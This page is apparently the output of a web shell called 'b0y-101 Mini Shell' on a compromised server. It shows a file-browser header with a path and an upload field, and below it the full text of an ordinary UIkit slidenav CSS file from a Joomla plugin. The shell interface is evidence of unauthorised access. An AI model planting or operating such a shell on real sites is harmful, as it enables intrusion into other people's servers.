b0y-101 Mini Shell


Current Path : E:/www2/plan/media/coalaweb/plugins/system/gears/uikit/css/components/
File Upload :
Current File : E:/www2/plan/media/coalaweb/plugins/system/gears/uikit/css/components/coalaweb.slidenav.css

/*! UIkit 2.27.4 | http://www.getuikit.com | (c) 2014 YOOtheme | MIT License */
/* ========================================================================
   Component: Slidenav
 ========================================================================== */
/*
 * 1. Required for `a` elements
 * 2. Dimension
 * 3. Style
 */
.cw-slidenav {
  /* 1 */
  display: inline-block;
  /* 2 */
  box-sizing: border-box;
  width: 60px;
  height: 60px;
  /* 3 */
  line-height: 60px;
  color: rgba(50, 50, 50, 0.4);
  font-size: 60px;
  text-align: center;
}
/*
 * Hover
 * 1. Apply hover style also to focus state
 * 2. Remove default focus style
 * 3. Required for `a` elements
 * 4. Style
 */
.cw-slidenav:hover,
.cw-slidenav:focus {
  /* 2 */
  outline: none;
  /* 3 */
  text-decoration: none;
  /* 4 */
  color: rgba(50, 50, 50, 0.7);
  cursor: pointer;
}
/* Active */
.cw-slidenav:active {
  color: rgba(50, 50, 50, 0.9);
}
/*
 * Icons
 */
.cw-slidenav-previous:before {
  content: "\f104";
  font-family: FontAwesome;
}
.cw-slidenav-next:before {
  content: "\f105";
  font-family: FontAwesome;
}
/* Sub-object: `cw-slidenav-position`
 ========================================================================== */
/*
 * Create position context
 */
.cw-slidenav-position {
  position: relative;
}
/*
 * Center vertically
 */
.cw-slidenav-position .cw-slidenav {
  display: none;
  position: absolute;
  top: 50%;
  z-index: 1;
  margin-top: -30px;
}
.cw-slidenav-position:hover .cw-slidenav {
  display: block;
}
.cw-slidenav-position .cw-slidenav-previous {
  left: 20px;
}
.cw-slidenav-position .cw-slidenav-next {
  right: 20px;
}
/* Modifier: `cw-slidenav-contrast`
 ========================================================================== */
.cw-slidenav-contrast {
  color: rgba(255, 255, 255, 0.5);
}
/*
 * Hover
 * 1. Apply hover style also to focus state
 */
.cw-slidenav-contrast:hover,
.cw-slidenav-contrast:focus {
  color: rgba(255, 255, 255, 0.7);
}
/* Active */
.cw-slidenav-contrast:active {
  color: rgba(255, 255, 255, 0.9);
}

Copyright © 2019 by b0y-101